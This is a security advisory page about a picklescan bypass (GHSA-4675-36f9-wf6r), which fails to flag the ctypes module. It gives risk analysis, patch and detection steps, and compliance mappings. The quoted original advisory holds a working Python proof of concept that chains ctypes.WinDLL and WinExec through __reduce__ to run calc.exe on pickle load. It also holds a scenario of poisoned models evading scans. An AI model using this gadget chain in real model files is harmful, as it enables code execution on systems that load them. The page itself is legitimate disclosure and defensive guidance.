AI Threat Alert

GHSA-4675-36f9-wf6r: picklescan: Allowlist Bypass evades input filtering

GHSA-4675-36f9-wf6r HIGH
Published December 29, 2025
CISO Take

picklescan is a last-line-of-defense security control for ML model files — this bypass nullifies that control entirely. Any organization using picklescan to gate pickle file loading in MLOps pipelines, model registries, or CI/CD must upgrade to v0.0.33 immediately. Until patched, assume picklescan provides zero protection against ctypes-based payloads and enforce strict allow-listing of model sources.

What is the risk?

HIGH risk with critical implications specific to AI/ML security posture. picklescan is commonly deployed as a trust gate for loading third-party or community ML models (PyTorch, scikit-learn, etc.). The ctypes bypass is particularly dangerous because: (1) it grants native OS-level code execution, not just Python-level; (2) it can dismantle Python interpreter sandboxes, defeating defense-in-depth; (3) a working PoC is publicly available, lowering attacker barrier significantly. Windows environments are most immediately threatened (WinDLL/WinExec), but the ctypes primitives are cross-platform and Linux/macOS variants are trivially achievable.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
picklescan pip < 0.0.33 0.0.33
413 3 dependents Pushed 1mo ago 69% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

How severe is it?

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

What should I do?

6 steps

  1. PATCH

    Upgrade picklescan to 0.0.33 immediately — this release adds ctypes to the dangerous module blocklist.

  2. VERIFY

    Audit CI/CD and MLOps pipelines to confirm picklescan version in use; check Dockerfiles, requirements.txt, and pre-commit hooks.

  3. INTERIM WORKAROUND

    If immediate upgrade is blocked, add an explicit denylist check for 'ctypes' in pre-load validation scripts.

  4. ARCHITECTURE

    Migrate to safer serialization formats (safetensors, ONNX, TorchScript) for any model served from untrusted sources — pickle should never be used for untrusted model distribution.

  5. DETECTION

    Search logs and artifact stores for .pkl/.pt/.pth files loaded from external sources in last 90 days; treat any pre-patch external model load as potentially compromised.

  6. POLICY

    Enforce model provenance — only load models from signed, internal registries or verified publisher accounts.

How is it classified?

Code Execution Supply Chain Auth Bypass Framework Model AML.T0010.001 AML.T0010.003 AML.T0011.000 AML.T0018.002 AML.T0097 AML.T0107

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art.15 - Accuracy, robustness and cybersecurity for high-risk AI systems Art.9 - Risk management system
ISO 42001
A.6.2.6 - AI supply chain security A.8.4 - AI system operation and monitoring
NIST AI RMF
GOVERN-6.1 - Policies and procedures are in place for AI supply chain traceability MANAGE-2.2 - Mechanisms to sustain the value of AI system treatments
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-4675-36f9-wf6r?

picklescan is a last-line-of-defense security control for ML model files — this bypass nullifies that control entirely. Any organization using picklescan to gate pickle file loading in MLOps pipelines, model registries, or CI/CD must upgrade to v0.0.33 immediately. Until patched, assume picklescan provides zero protection against ctypes-based payloads and enforce strict allow-listing of model sources.

Is GHSA-4675-36f9-wf6r actively exploited?

No confirmed active exploitation of GHSA-4675-36f9-wf6r has been reported, but organizations should still patch proactively.

How to fix GHSA-4675-36f9-wf6r?

1. PATCH: Upgrade picklescan to 0.0.33 immediately — this release adds ctypes to the dangerous module blocklist. 2. VERIFY: Audit CI/CD and MLOps pipelines to confirm picklescan version in use; check Dockerfiles, requirements.txt, and pre-commit hooks. 3. INTERIM WORKAROUND: If immediate upgrade is blocked, add an explicit denylist check for 'ctypes' in pre-load validation scripts. 4. ARCHITECTURE: Migrate to safer serialization formats (safetensors, ONNX, TorchScript) for any model served from untrusted sources — pickle should never be used for untrusted model distribution. 5. DETECTION: Search logs and artifact stores for .pkl/.pt/.pth files loaded from external sources in last 90 days; treat any pre-patch external model load as potentially compromised. 6. POLICY: Enforce model provenance — only load models from signed, internal registries or verified publisher accounts.

What systems are affected by GHSA-4675-36f9-wf6r?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, ML model registries, agent frameworks, data science environments.

What is the CVSS score for GHSA-4675-36f9-wf6r?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

model servingtraining pipelinesML model registriesagent frameworksdata science environments

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0010.003 Model
AML.T0011.000 Unsafe AI Artifacts
AML.T0018.002 Embed Malware
AML.T0097 Virtualization/Sandbox Evasion
AML.T0107 Exploitation for Defense Evasion

Compliance Controls Affected

EU AI Act: Art.15, Art.9
ISO 42001: A.6.2.6, A.8.4
NIST AI RMF: GOVERN-6.1, MANAGE-2.2
OWASP LLM Top 10: LLM03:2025

What are the technical details?

Original Advisory

### Summary Picklescan doesnt flag ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to * Load DLLs * Call C functions directly * Manipulate memory raw pointers. This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter based python sandboxes as ctypes allow direct access to raw memory. This is a more severe loophole than normal gadget chains and bypasses as raw memory access can be used for a lot of nefarious purposes down the line if left undetected ### PoC ```python import pickle import ctypes import operator class Kernel32Loader: def __reduce__(self): #we go direct to the kerneeellllllll return (ctypes.WinDLL, ("kernel32.dll",)) class WinExecGetter: def __reduce__(self): return (operator.itemgetter("WinExec"), (Kernel32Loader(),)) class PopCalc: def __reduce__(self): #methodcaller to invoke "__call__" on the function pointer. return ( operator.methodcaller("__call__", b"calc.exe", 1), (WinExecGetter(),) ) try: payload = pickle.dumps(PopCalc()) with open("calc_exploit.pkl", "wb") as f: f.write(payload) print("Generated 'calc_exploit.pkl'") except Exception as e: print(f"Generation failed: {e}") ``` This will create a pickle file which is not detected by the latest version of picklescan as malicious ```python import pickle print("Loading bypass.pkl...") pickle.load(open("calc_exploit.pkl", "rb")) ``` <img width="1333" height="677" alt="image" src="https://github.com/user-attachments/assets/f5b066f3-116a-4377-a538-f293f3a6c176" />

Exploitation Scenario

An adversary targeting an MLOps team publishes a malicious PyTorch model to a public repository (e.g., Hugging Face, GitHub). The model performs as advertised for its stated task but embeds a ctypes payload in its __reduce__ method. The victim organization's CI pipeline pulls the model, runs picklescan (< 0.0.33) — scan returns clean. The model is promoted to staging. Upon first load by a training or inference worker, pickle deserialization triggers the ctypes payload, loading kernel32.dll (Windows) or libc (Linux) and executing arbitrary OS commands under the service account's privileges — achieving persistent RCE in the MLOps environment without triggering any pickle-layer detection.

Weaknesses (CWE)

CWE-184 Incomplete List of Disallowed Inputs Primary CWE-913 Improper Control of Dynamically-Managed Code Resources Primary

CWE-184 — Incomplete List of Disallowed Inputs: The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.

  • [Implementation] Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs.

Source: MITRE CWE corpus.

References

Timeline

Published
December 29, 2025
Last Modified
December 29, 2025
First Seen
March 24, 2026

Related Vulnerabilities

CRITICAL CVE-2026-3490 10.0

picklescan: blocklist bypass enables full RCE

Same package: picklescan
CRITICAL GHSA-vvpj-8cmc-gx39 10.0

picklescan: security flaw enables exploitation

Same package: picklescan
CRITICAL GHSA-g38g-8gr9-h9xp 9.8

picklescan: Allowlist Bypass evades input filtering

Same package: picklescan
CRITICAL CVE-2025-1945 9.8

picklescan: ZIP flag bypass enables RCE in PyTorch models

Same package: picklescan
CRITICAL GHSA-7wx9-6375-f5wh 9.8

picklescan: Allowlist Bypass evades input filtering

Same package: picklescan
Back to Threat Feed